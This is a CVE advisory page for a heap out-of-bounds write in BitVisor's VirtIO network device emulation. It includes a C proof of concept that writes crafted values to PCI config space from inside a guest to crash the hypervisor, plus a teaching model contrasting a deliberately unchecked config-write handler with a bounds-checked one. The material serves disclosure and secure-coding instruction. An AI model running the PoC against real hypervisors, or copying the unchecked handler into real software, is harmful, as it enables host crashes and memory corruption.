Security Vulnerability Report
CVE-2025-61553 CVSS 8.2 HIGH

CVE-2025-61553

Published: 2025-10-16 19:15:34
Last Modified: 2026-04-15 00:35:42

Description

An out-of-bounds write in VirtIO network device emulation in BitVisor from commit 108df6 (2020-05-20) to commit 480907 (2025-07-06) allows local attackers to cause a denial of service (host hypervisor crash) via a crafted PCI configuration space access. Given it's a heap overflow in a privileged hypervisor context, exploitation may enable arbitrary code execution or guest-to-host privilege escalation.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Reading the vector: the attacker is local and already highly privileged (ring 0 inside the guest, which the PoC's iopl(3) call reflects), and the changed scope records the guest-to-host crossing.
CVSS Source
134c704f-9b21-4f2e-91b3-4a467353bcc0 (type Secondary; the record carries no Primary metric)
Weaknesses
CWE-122 (Heap-based Buffer Overflow), CWE-787 (Out-of-bounds Write)

Configurations (Affected Products)

No configuration data available.

All BitVisor versions from commit 108df6 (2020-05-20) up to commit 480907 (2025-07-06).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
/* CVE-2025-61553 - BitVisor VirtIO Network Device OOB Write PoC
 *
 * This PoC demonstrates triggering an out-of-bounds write in BitVisor's
 * VirtIO network device emulation via crafted PCI configuration space access.
 *
 * Note: This requires running inside a BitVisor guest VM with elevated privileges
 * to access PCI configuration space of the VirtIO network device.
 *
 * Compile: gcc -o poc poc.c -lpci
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/io.h>
#include <pci/pci.h>

#define VIRTIO_NET_VENDOR_ID 0x1AF4
#define VIRTIO_NET_DEVICE_ID 0x1000
#define PCI_CONFIG_ADDR 0xCF8
#define PCI_CONFIG_DATA 0xCFC

/* Find VirtIO network device on PCI bus */
int find_virtio_net_device(int *bus, int *dev, int *func)
{
    struct pci_access *pacc;
    struct pci_dev *dev_ptr;
    int found = 0;

    pacc = pci_alloc();
    pci_init(pacc);
    pci_scan_bus(pacc);

    for (dev_ptr = pacc->devices; dev_ptr; dev_ptr = dev_ptr->next) {
        pci_fill_info(dev_ptr, PCI_FILL_IDENT | PCI_FILL_BASES);
        if (dev_ptr->vendor_id == VIRTIO_NET_VENDOR_ID &&
            dev_ptr->device_id == VIRTIO_NET_DEVICE_ID) {
            *bus = dev_ptr->bus;
            *dev = dev_ptr->dev;
            *func = dev_ptr->func;
            found = 1;
            printf("[+] Found VirtIO Net device at %02x:%02x.%d\n", *bus, *dev, *func);
            break;
        }
    }

    pci_cleanup(pacc);
    return found;
}

/* Crafted PCI config space write to trigger OOB write */
void trigger_oob_write(int bus, int dev, int func)
{
    unsigned int config_addr;
    unsigned int crafted_value;
    int ret;

    /* Request I/O port access for PCI configuration */
    ret = iopl(3);
    if (ret < 0) {
        perror("[-] iopl failed - need root privileges");
        return;
    }

    /* Build PCI configuration space address (mechanism #1)
     * Bit 31:     Enable bit
     * Bits 23-16: Bus number
     * Bits 15-11: Device number
     * Bits 10-8:  Function number
     * Bits 7-2:   Register offset (dword-aligned, i.e. byte offset & 0xFC)
     * Bits 1-0:   Always 0 (ignored by the address decoder)
     */

    /* Target an out-of-bounds offset in the device's internal buffer.
     * The vulnerability is triggered when writing to a specific
     * PCI config space register that maps to the VirtIO device's
     * internal state buffer without proper bounds checking. */

    /* Attempt 1: Write to the last dword of the 256-byte config space.
     * The low two bits of 0xFF are ignored by the decoder, so this
     * dword write lands at byte offset 0xFC. */
    config_addr = (1u << 31) | (bus << 16) | (dev << 11) | (func << 8) | 0xFF;
    crafted_value = 0xDEADBEEF;
    printf("[*] Attempting crafted PCI config write to trigger OOB...\n");
    outl(config_addr, PCI_CONFIG_ADDR);   /* glibc sys/io.h: outl(value, port) */
    outl(crafted_value, PCI_CONFIG_DATA);

    /* Attempt 2: Write to BAR-related registers (BAR0..BAR5 at 0x10..0x24
     * and the CardBus CIS pointer at 0x28) with crafted values */
    for (int offset = 0x10; offset <= 0x28; offset += 4) {
        config_addr = (1u << 31) | (bus << 16) | (dev << 11) | (func << 8) | offset;
        outl(config_addr, PCI_CONFIG_ADDR);
        outl(0x41414141, PCI_CONFIG_DATA);
    }

    printf("[*] PoC executed. If vulnerable, hypervisor may crash.\n");
}

int main(int argc, char *argv[])
{
    int bus = 0, dev = 0, func = 0;

    printf("=== CVE-2025-61553 BitVisor VirtIO OOB Write PoC ===\n");
    printf("[*] Searching for VirtIO network device...\n");

    if (!find_virtio_net_device(&bus, &dev, &func)) {
        printf("[-] VirtIO network device not found\n");
        return 1;
    }

    trigger_oob_write(bus, dev, func);
    return 0;
}
```
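The PoC only drives the guest side. The following is an added example, not BitVisor's code and not from the advisory, that models the hypervisor side of the bug class the record names (CWE-787 in PCI config-space emulation): the 0xCF8/0xCFC port intercept a hypervisor sees, a config-space write handler that trusts the guest's offset and length, and the hardened form beside it. The struct layout, the handler names (cfg_write_unchecked, cfg_write_checked, io_write) and the "neighbour" object placed right after the config space are assumptions made for the model. It also shows why the PoC's "| 0xFF" addresses the dword at 0xFC (the decoder ignores bits 1:0), and why a 4-byte access through data port 0xCFE (offset 0xFE, length 4) is the kind of input a bounds check has to reject.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model, not BitVisor's code: the 256 bytes of legacy config
 * space reachable through 0xCF8/0xCFC, followed directly by a neighbouring
 * object as a heap allocator might place one (the OOB-write victim). */
#define PCI_CFG_SIZE    256
#define NEIGHBOUR_SIZE  16
#define PCI_CONFIG_ADDR 0xCF8
#define PCI_CONFIG_DATA 0xCFC

struct emu_dev {
    uint32_t cf8;                                  /* latched address register */
    uint8_t  mem[PCI_CFG_SIZE + NEIGHBOUR_SIZE];   /* config space, then neighbour */
};

static const uint8_t neighbour_pattern[NEIGHBOUR_SIZE] = {
    0x5a, 0xa5, 0x5a, 0xa5, 0x5a, 0xa5, 0x5a, 0xa5,
    0x5a, 0xa5, 0x5a, 0xa5, 0x5a, 0xa5, 0x5a, 0xa5 };

void emu_dev_init(struct emu_dev *d)
{
    memset(d, 0, sizeof *d);
    memcpy(d->mem + PCI_CFG_SIZE, neighbour_pattern, NEIGHBOUR_SIZE);
}

bool neighbour_intact(const struct emu_dev *d)
{
    return memcmp(d->mem + PCI_CFG_SIZE, neighbour_pattern, NEIGHBOUR_SIZE) == 0;
}

/* Register byte offset from a mechanism #1 address: bits 7:2; bits 1:0 are
 * ignored, which is why the PoC's "| 0xFF" addresses the dword at 0xFC. */
unsigned cf8_reg(uint32_t cf8) { return cf8 & 0xFC; }

/* Vulnerable pattern: offset and length are used as the guest supplied them. */
int cfg_write_unchecked(struct emu_dev *d, unsigned offset, unsigned len, uint32_t value)
{
    memcpy(d->mem + offset, &value, len);
    return 0;
}

/* Hardened: the whole access must lie inside the config space. Written as
 * len > size - offset rather than offset + len > size so it cannot wrap. */
int cfg_write_checked(struct emu_dev *d, unsigned offset, unsigned len, uint32_t value)
{
    if (len != 1 && len != 2 && len != 4)
        return -1;
    if (offset >= PCI_CFG_SIZE || len > PCI_CFG_SIZE - offset)
        return -1;
    memcpy(d->mem + offset, &value, len);
    return 0;
}

typedef int (*cfg_write_fn)(struct emu_dev *, unsigned, unsigned, uint32_t);

/* Port-I/O intercept as a hypervisor sees it: size is 1, 2 or 4 and the data
 * port can be any of 0xCFC..0xCFF, so offset = reg | (port - 0xCFC). */
int io_write(struct emu_dev *d, uint16_t port, unsigned size, uint32_t value, cfg_write_fn w)
{
    if (port == PCI_CONFIG_ADDR && size == 4) {
        d->cf8 = value;
        return 0;
    }
    if (port >= PCI_CONFIG_DATA && port < PCI_CONFIG_DATA + 4) {
        if (!(d->cf8 & 0x80000000u))
            return -1;                       /* enable bit clear: no config cycle */
        unsigned offset = cf8_reg(d->cf8) | (port - PCI_CONFIG_DATA);
        return w(d, offset, size, value);
    }
    return -1;                               /* not a config port */
}

/* Replays the PoC's first access (address | 0xFF, value 0xDEADBEEF), then a
 * 4-byte write through 0xCFE that crosses the end of the config space. */
bool neighbour_survives(cfg_write_fn w)
{
    struct emu_dev d;
    emu_dev_init(&d);
    uint32_t addr = (1u << 31) | (0u << 16) | (3u << 11) | (0u << 8) | 0xFF;
    io_write(&d, PCI_CONFIG_ADDR, 4, addr, w);
    io_write(&d, PCI_CONFIG_DATA, 4, 0xDEADBEEF, w);       /* offset 0xFC: in range */
    io_write(&d, PCI_CONFIG_DATA + 2, 4, 0x41414141, w);   /* offset 0xFE: 2 bytes past */
    return neighbour_intact(&d);
}

/* Result of one access against the hardened handler on a fresh device. */
int checked_result(unsigned offset, unsigned len)
{
    struct emu_dev d;
    emu_dev_init(&d);
    return cfg_write_checked(&d, offset, len, 0x41414141);
}

int main(void)
{
    printf("unchecked handler: neighbour %s\n",
           neighbour_survives(cfg_write_unchecked) ? "intact" : "CORRUPTED");
    printf("checked handler:   neighbour %s\n",
           neighbour_survives(cfg_write_checked) ? "intact" : "CORRUPTED");
    return 0;
}
```

Built with plain gcc and no libraries, the unchecked handler reports the neighbour as corrupted after the 0xCFE access while the checked handler leaves it intact and returns -1 for that access. The check is deliberately written as len > PCI_CFG_SIZE - offset after an offset < PCI_CFG_SIZE test, because offset + len > PCI_CFG_SIZE can wrap for a large guest-controlled offset and pass.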

References

https://github.com/retrage/advisories/blob/main/CVE-2025-61553/README.md (advisory)
https://sourceforge.net/p/bitvisor/code/ci/48090711ade5910b601d2b0034859a6a890cc82d/ (BitVisor commit 480907)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61553", "sourceIdentifier": "[email protected]", "published": "2025-10-16T19:15:33.983", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An out-of-bounds write in VirtIO network device emulation in BitVisor from commit 108df6 (2020-05-20) to commit 480907 (2025-07-06) allows local attackers to cause a denial of service (host hypervisor crash) via a crafted PCI configuration space access. Given it's a heap overflow in a privileged hypervisor context, exploitation may enable arbitrary code execution or guest-to-host privilege escalation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.5, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://github.com/retrage/advisories/blob/main/CVE-2025-61553/README.md", "source": "[email protected]"}, {"url": "https://sourceforge.net/p/bitvisor/code/ci/48090711ade5910b601d2b0034859a6a890cc82d/", "source": "[email protected]"}]}}